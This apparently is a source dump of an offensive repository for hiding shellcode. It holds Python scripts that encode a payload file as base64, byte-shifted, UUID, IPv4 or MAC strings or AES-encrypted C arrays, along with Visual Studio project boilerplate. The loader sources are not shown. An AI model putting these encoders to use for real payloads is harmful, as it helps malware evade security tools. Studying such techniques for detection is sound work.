├── calc.bin
├── 3 - Encrypting
└── 1 - AES
│ ├── calc.bin
│ ├── AES
│ ├── AES.vcxproj.user
│ ├── AES.vcxproj.filters
│ ├── AES.sln
│ ├── AES.cpp
│ └── AES.vcxproj
│ └── AES_cryptor.py
├── 2 - Encoding
├── 5 - MAC shellcode
│ ├── calc.bin
│ ├── MACshellcode
│ │ ├── MACshellcode.vcxproj.user
│ │ ├── MACshellcode.vcxproj.filters
│ │ ├── MACshellcode.sln
│ │ ├── MACshellcode.cpp
│ │ └── MACshellcode.vcxproj
│ └── bin2mac.py
├── 1 - Base64 Loading
│ ├── calc.bin
│ ├── Base64
│ │ ├── Base64.vcxproj.user
│ │ ├── Base64.vcxproj.filters
│ │ ├── Base64.sln
│ │ ├── Base64.cpp
│ │ └── Base64.vcxproj
│ └── base64_Encoder.py
├── 2 - Custom Encoding
│ ├── calc.bin
│ ├── CustomEncoding
│ │ ├── CustomEncoding.vcxproj.user
│ │ ├── CustomEncoding.vcxproj.filters
│ │ ├── CustomEncoding.sln
│ │ ├── CustomEncoding.cpp
│ │ └── CustomEncoding.vcxproj
│ └── customEncoder.py
├── 3 - UUID shellcode
│ ├── calc.bin
│ ├── UUIDs
│ │ ├── UUIDs.vcxproj.user
│ │ ├── UUIDs.vcxproj.filters
│ │ ├── UUIDs.sln
│ │ ├── UUIDs.cpp
│ │ └── UUIDs.vcxproj
│ └── bin2uuids.py
└── 4 - IPv4 shellcode
│ ├── calc.bin
│ ├── IPfuscation
│ ├── IPfuscation.vcxproj.user
│ ├── IPfuscation.vcxproj.filters
│ ├── IPfuscation.sln
│ ├── IPfuscation.cpp
│ └── IPfuscation.vcxproj
│ └── bin2ipv4.py
├── 1 - Simple Loader
└── SimpleLoader
│ ├── SimpleLoader.vcxproj.user
│ ├── SimpleLoader.vcxproj.filters
│ ├── SimpleLoader.sln
│ ├── SimpleLoader.cpp
│ └── SimpleLoader.vcxproj
├── 4 - Fileless Shellcode
├── 1 - Using Sockets
│ ├── FilelessShellcode.vcxproj.user
│ ├── FilelessShellcode.vcxproj.filters
│ ├── FilelessShellcode.sln
│ ├── FilelessShellcode.cpp
│ └── FilelessShellcode.vcxproj
└── 2 - Using WinHttp
│ └── WinhttpShellcode
│ ├── WinhttpShellcode.vcxproj.user
│ ├── WinhttpShellcode.vcxproj.filters
│ ├── WinhttpShellcode.sln
│ ├── WinhttpShellcode.cpp
│ └── WinhttpShellcode.vcxproj
├── format.py
└── LICENSE
/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/calc.bin
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/3 - Encrypting/1 - AES/calc.bin
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/2 - Encoding/5 - MAC shellcode/calc.bin
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/2 - Encoding/1 - Base64 Loading/calc.bin
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/2 - Encoding/2 - Custom Encoding/calc.bin
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/2 - Encoding/3 - UUID shellcode/calc.bin
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/2 - Encoding/4 - IPv4 shellcode/calc.bin
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/AES/AES.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/1 - Simple Loader/SimpleLoader/SimpleLoader.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/UUIDs/UUIDs.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/Base64/Base64.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/IPfuscation/IPfuscation.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/MACshellcode/MACshellcode.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/1 - Using Sockets/FilelessShellcode.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/CustomEncoding/CustomEncoding.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/2 - Using WinHttp/WinhttpShellcode/WinhttpShellcode.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/base64_Encoder.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import base64
3 |
4 |
5 | try:
6 | content = open(sys.argv[1], "rb").read()
7 | except:
8 | print("Usage: .\base64.py PAYLOAD_FILE")
9 | sys.exit()
10 |
11 |
12 | b64 = base64.b64encode(content)
13 | print(b64.decode("utf-8"))
14 |
15 |
--------------------------------------------------------------------------------
/format.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | def printResult(content):
4 |
5 | print('unsigned char shellcode[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in content) + ' };')
6 |
7 | try:
8 | file = open(sys.argv[1], "rb")
9 | content = file.read()
10 | except:
11 | print("Usage: .\format.py PAYLOAD_FILE")
12 | sys.exit()
13 |
14 | printResult(content)
15 |
16 |
17 |
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/bin2mac.py:
--------------------------------------------------------------------------------
1 | from macaddress import MAC
2 | import sys
3 |
4 | if len(sys.argv) < 2:
5 | print("Usage: %s " % sys.argv[0])
6 | sys.exit(1)
7 |
8 | with open(sys.argv[1], "rb") as f:
9 | chunk = f.read(6)
10 | print("{}const char* MAC[] =".format(' '*4))
11 | print(" {")
12 | while chunk:
13 | if len(chunk) < 6:
14 | padding = 6 - len(chunk)
15 | chunk = chunk + (b"\x90" * padding)
16 | print("{}\"{}\"".format(' '*8,MAC(chunk)))
17 | break
18 | print("{}\"{}\",".format(' '*8,MAC(chunk)))
19 | chunk = f.read(6)
20 | print(" };")
21 |
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/bin2ipv4.py:
--------------------------------------------------------------------------------
1 | from ipaddress import ip_address
2 | import sys
3 |
4 | if len(sys.argv) < 2:
5 | print("Usage: %s " % sys.argv[0])
6 | sys.exit(1)
7 |
8 | with open(sys.argv[1], "rb") as f:
9 | chunk = f.read(4)
10 | print("{}const char* IPv4s[] =".format(' '*4))
11 | print(" {")
12 | while chunk:
13 | if len(chunk) < 4:
14 | padding = 4 - len(chunk)
15 | chunk = chunk + (b"\x90" * padding)
16 | print("{}\"{}\"".format(' '*8,ip_address(chunk)))
17 | break
18 | print("{}\"{}\",".format(' '*8,ip_address(chunk)))
19 | chunk = f.read(4)
20 | print(" };")
21 |
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/customEncoder.py:
--------------------------------------------------------------------------------
1 | # python3
2 | import sys
3 |
4 | def Encode(data):
5 | cipherText = ""
6 | for i in range(len(data)):
7 | if i % 2 == 0:
8 | cipherText += chr(data[i]+1)
9 | else:
10 | cipherText += chr(data[i]+2)
11 | return cipherText
12 |
13 |
14 | def printCiphertext(ciphertext):
15 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
16 |
17 |
18 | try:
19 | content = open(sys.argv[1], "rb").read()
20 |
21 | except:
22 | print("Usage: .\Encoder.py PAYLOAD_FILE")
23 | sys.exit()
24 |
25 |
26 | cipherText = Encode(content)
27 | printCiphertext(cipherText)
28 |
29 |
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/bin2uuids.py:
--------------------------------------------------------------------------------
1 | # Author : boku7 from (https://github.com/boku7/Ninja_UUID_Runner/blob/main/bin2uuids.py)
2 | from uuid import UUID
3 | import sys
4 |
5 | if len(sys.argv) < 2:
6 | print("Usage: %s " % sys.argv[0])
7 | sys.exit(1)
8 |
9 | with open(sys.argv[1], "rb") as f:
10 | chunk = f.read(16)
11 | print("{}const char* uuids[] =".format(' '*4))
12 | print(" {")
13 | while chunk:
14 | if len(chunk) < 16:
15 | padding = 16 - len(chunk)
16 | chunk = chunk + (b"\x90" * padding)
17 | print("{}\"{}\"".format(' '*8,UUID(bytes_le=chunk)))
18 | break
19 | print("{}\"{}\",".format(' '*8,UUID(bytes_le=chunk)))
20 | chunk = f.read(16)
21 | print(" };")
22 |
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/AES_cryptor.py:
--------------------------------------------------------------------------------
1 | import sys
2 | from Crypto.Cipher import AES
3 | from Crypto.Util.Padding import pad
4 | from os import urandom
5 | import hashlib
6 |
7 | def AESencrypt(plaintext, key):
8 | k = hashlib.sha256(KEY).digest()
9 | iv = 16 * b'\x00'
10 | plaintext = pad(plaintext, AES.block_size)
11 | cipher = AES.new(k, AES.MODE_CBC, iv)
12 | ciphertext = cipher.encrypt(plaintext)
13 | return ciphertext,key
14 |
15 |
16 | def printResult(key, ciphertext):
17 | print('char AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
18 | print('unsigned char AESshellcode[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')
19 |
20 | try:
21 | file = open(sys.argv[1], "rb")
22 | content = file.read()
23 | except:
24 | print("Usage: .\AES_cryptor.py PAYLOAD_FILE")
25 | sys.exit()
26 |
27 |
28 | KEY = urandom(16)
29 | ciphertext, key = AESencrypt(content, KEY)
30 |
31 | printResult(KEY,ciphertext)
32 |
33 |
34 |
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/AES/AES.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/Base64/Base64.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/UUIDs/UUIDs.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/1 - Simple Loader/SimpleLoader/SimpleLoader.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/IPfuscation/IPfuscation.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/MACshellcode/MACshellcode.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/CustomEncoding/CustomEncoding.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/1 - Using Sockets/FilelessShellcode.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/2 - Using WinHttp/WinhttpShellcode/WinhttpShellcode.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2023 SAAD AHLA
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/AES/AES.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AES", "AES.vcxproj", "{B2EE63EA-095F-40CC-92D8-BAC976655636}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Debug|x64.ActiveCfg = Debug|x64
17 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Debug|x64.Build.0 = Debug|x64
18 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Debug|x86.ActiveCfg = Debug|Win32
19 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Debug|x86.Build.0 = Debug|Win32
20 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Release|x64.ActiveCfg = Release|x64
21 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Release|x64.Build.0 = Release|x64
22 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Release|x86.ActiveCfg = Release|Win32
23 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {E673D20E-7313-4141-8040-48CDDB2BA099}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/UUIDs/UUIDs.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "UUIDs", "UUIDs.vcxproj", "{70527328-DCEC-4BA7-9958-B5BC3E48CE99}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Debug|x64.ActiveCfg = Debug|x64
17 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Debug|x64.Build.0 = Debug|x64
18 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Debug|x86.ActiveCfg = Debug|Win32
19 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Debug|x86.Build.0 = Debug|Win32
20 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Release|x64.ActiveCfg = Release|x64
21 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Release|x64.Build.0 = Release|x64
22 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Release|x86.ActiveCfg = Release|Win32
23 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {806A7F57-2693-4B23-9C28-84878B8D4277}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/Base64/Base64.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Base64", "Base64.vcxproj", "{B651A53C-FAE6-482E-A590-CA3B48B7F384}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Debug|x64.ActiveCfg = Debug|x64
17 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Debug|x64.Build.0 = Debug|x64
18 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Debug|x86.ActiveCfg = Debug|Win32
19 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Debug|x86.Build.0 = Debug|Win32
20 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Release|x64.ActiveCfg = Release|x64
21 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Release|x64.Build.0 = Release|x64
22 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Release|x86.ActiveCfg = Release|Win32
23 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {6CD1D8F0-AC05-4C8F-AB99-5C58D52C5DA2}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/1 - Simple Loader/SimpleLoader/SimpleLoader.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SimpleLoader", "SimpleLoader.vcxproj", "{497CA37F-506C-46CD-9B8D-F9BB0DA34B95}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Debug|x64.ActiveCfg = Debug|x64
17 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Debug|x64.Build.0 = Debug|x64
18 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Debug|x86.ActiveCfg = Debug|Win32
19 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Debug|x86.Build.0 = Debug|Win32
20 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Release|x64.ActiveCfg = Release|x64
21 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Release|x64.Build.0 = Release|x64
22 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Release|x86.ActiveCfg = Release|Win32
23 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {61D8B48B-FE5C-41ED-8B9A-0AB0E727CFEC}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/IPfuscation/IPfuscation.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "IPfuscation", "IPfuscation.vcxproj", "{11385CC1-54B7-4968-9052-DF8BB1961F1E}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Debug|x64.ActiveCfg = Debug|x64
17 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Debug|x64.Build.0 = Debug|x64
18 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Debug|x86.ActiveCfg = Debug|Win32
19 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Debug|x86.Build.0 = Debug|Win32
20 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Release|x64.ActiveCfg = Release|x64
21 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Release|x64.Build.0 = Release|x64
22 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Release|x86.ActiveCfg = Release|Win32
23 | {11385CC1-54B7-4968-9052-DF8BB1961F1E}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {E345F425-7FDE-47CA-BCA8-CD85083D9B86}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/MACshellcode/MACshellcode.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MACshellcode", "MACshellcode.vcxproj", "{E991E6A7-31EA-42E3-A471-90F0090E3AFD}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {E991E6A7-31EA-42E3-A471-90F0090E3AFD}.Debug|x64.ActiveCfg = Debug|x64
